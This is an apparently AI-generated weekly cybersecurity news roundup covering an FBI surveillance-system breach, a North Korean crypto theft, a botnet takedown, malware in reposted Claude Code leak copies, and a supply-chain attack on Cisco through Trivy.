The FBI Got Hacked Through Its Own Wiretap System
FBI surveillance systems breached, North Korea steals $280M in crypto, Claude Code leaks malware, and a 22-year-old student helps take down a record botnet. This week in cybersecurity.
The agency that wiretaps the world just got wiretapped.
This week, the FBI formally declared a cyberattack on its own surveillance collection systems a "major incident" under federal law—a designation reserved for breaches believed to pose serious risks to national security. It's the first time the bureau has made such a declaration about its own systems since at least 2020. And if the suspected culprit is confirmed, it's not just embarrassing. It's a counterintelligence failure with no clean resolution in sight.
That's just one story from a week that served as a reminder: the infrastructure holding digital life together is far more fragile than most people assume.
The FBI's Worst-Case Scenario
According to Politico, two senior Trump administration officials believe China is behind the intrusion into the FBI's unclassified surveillance systems. Hackers reportedly entered through a commercial internet service provider—the same type of carrier infrastructure that Salt Typhoon, China's long-running espionage campaign, has been systematically compromising since at least 2024.
What was exposed? Court-ordered phone and internet metadata. Personal information on subjects of FBI investigations. The bureau detected "suspicious activities" in February and notified Congress on March 4. In its only public statement, the FBI said it deployed "all technical capabilities to respond"—language that tells you almost nothing.
Here's why the timing matters. Salt Typhoon, uncovered in 2024, had already burrowed into at least 8 domestic telecom and ISP providers, affecting 200+ companies across 80 countries. Researchers said it showed no signs of slowing. This latest breach isn't an isolated incident—it's the same campaign finding a new door. The FBI wasn't just a victim of a hack. It was compromised through the very surveillance infrastructure it relies on to monitor others.
The irony is almost too clean to be accidental.
North Korea Stole $280 Million. Again.
Decentralized finance platform Drift confirmed a $280 million cryptocurrency theft this week. Blockchain analytics firm Elliptic attributed the breach to North Korean hackers, citing laundering patterns and network-level indicators consistent with previous Pyongyang-linked operations.
To put that number in context: North Korean hackers stole a total of $2 billion in crypto last year. This year, they're already at nearly $300 million with this single heist accounting for the vast majority. The pace hasn't slowed. The methods haven't changed dramatically. And the destination of those funds—Kim Jong Un's weapons programs—remains the same.
What has changed is the target profile. DeFi platforms, by design, operate with minimal central oversight. That's the feature. It's also the vulnerability. When there's no central authority to freeze assets or reverse transactions, the window for recovery closes fast. Elliptic tracked the stolen funds moving across blockchains within hours.
For crypto investors and developers: this isn't a question of whether DeFi platforms will be targeted. They already are, repeatedly, at scale.
A 22-Year-Old Helped Take Down a Record-Breaking Botnet
Two weeks ago, US law enforcement dismantled four interconnected botnets—Aisuru, Kimwolf, JackSkid, and Mossad—responsible for some of the largest distributed denial-of-service attacks ever recorded. The Wall Street Journal this week revealed an unlikely figure at the center of the investigation: Benjamin Brundage, a 22-year-old student at the Rochester Institute of Technology.
Brundage obsessively tracked the Kimwolf botnet, which infected home routers and IoT devices to turn them into "residential proxies"—essentially backdoors into ordinary households. He lurked on Discord, chatted with people he suspected had insider knowledge, and pieced together technical clues that he passed to law enforcement.
No government clearance. No advanced equipment. Just persistence and pattern recognition.
The residential proxy angle is worth sitting with. If your home router is running default firmware with factory passwords, it may already be part of someone else's attack infrastructure. You wouldn't know. The WSJ published a guide this week on how to check—and it's worth reading.
Claude Code's Leak Came With a Bonus: Malware
Anthropic accidentally made the source code for Claude Code—its popular AI-assisted coding tool—publicly accessible. Within hours, developers began reposting copies on GitHub. Some of those repos, BleepingComputer reports, were planted by hackers embedding infostealer malware in the code.
Anthropic responded with copyright takedown notices, initially targeting more than 8,000 repositories before narrowing to 96 copies and adaptations. The malware-laced versions are still circulating.
This is the second time in a month that Claude Code has been weaponized as a delivery mechanism. In March, sponsored Google search ads directed users to fake Claude Code installation pages that prompted them to run malicious terminal commands. The pattern is consistent: Claude Code attracts users who are comfortable enough with technology to use AI coding tools, but unfamiliar enough with terminal environments to scrutinize what they're running.
That's a precise and exploitable gap.
Cisco's Source Code Was Stolen Through a Security Scanner
Hacker group TeamPCP breached Cisco's developer environments and stole portions of the company's source code—along with code belonging to some of its customers. The entry point? Trivy, a widely used vulnerability scanning tool that TeamPCP had already compromised with its own malicious code.
TeamPCP has used the same playbook against LiteLLM and CheckMarx. The strategy is consistent: compromise a trusted security or developer tool, use it to harvest credentials, then move laterally into high-value targets.
Supply chain attacks are particularly corrosive because they exploit the tools organizations use to protect themselves. The more a company invests in security scanning, the more attractive those scanners become as attack vectors. There's no clean answer to that paradox—only the uncomfortable recognition that trust in software dependencies has to be continuously re-earned, not assumed.
This content is AI-generated based on source articles. While we strive for accuracy, errors may occur. We recommend verifying with the original source.
Related Articles
A surprise leak of Anthropic's Claude Code source code revealed 'Kairos'—a dormant background AI agent designed to act before you even ask. Here's what it means.
A routine update to Claude Code leaked over 512,000 lines of TypeScript source code, exposing internal AI instructions, unreleased features, and memory architecture. What does this mean for AI transparency?
Fake shelter apps, death threats by text, and silent infrastructure attacks. The Iran-Israel-US cyber conflict is reshaping what war looks like in 2026.
LiteLLM ditched compliance startup Delve after credential-stealing malware hit its open source tool — and Delve itself faces allegations of generating fake audit data. What this means for third-party security trust.
A surprise leak of Anthropic's Claude Code source code revealed 'Kairos'—a dormant background AI agent designed to act before you even ask. Here's what it means.
A routine update to Claude Code leaked over 512,000 lines of TypeScript source code, exposing internal AI instructions, unreleased features, and memory architecture. What does this mean for AI transparency?
Fake shelter apps, death threats by text, and silent infrastructure attacks. The Iran-Israel-US cyber conflict is reshaping what war looks like in 2026.
LiteLLM ditched compliance startup Delve after credential-stealing malware hit its open source tool — and Delve itself faces allegations of generating fake audit data. What this means for third-party security trust.
Thoughts
Share your thoughts on this article
Sign in to join the conversation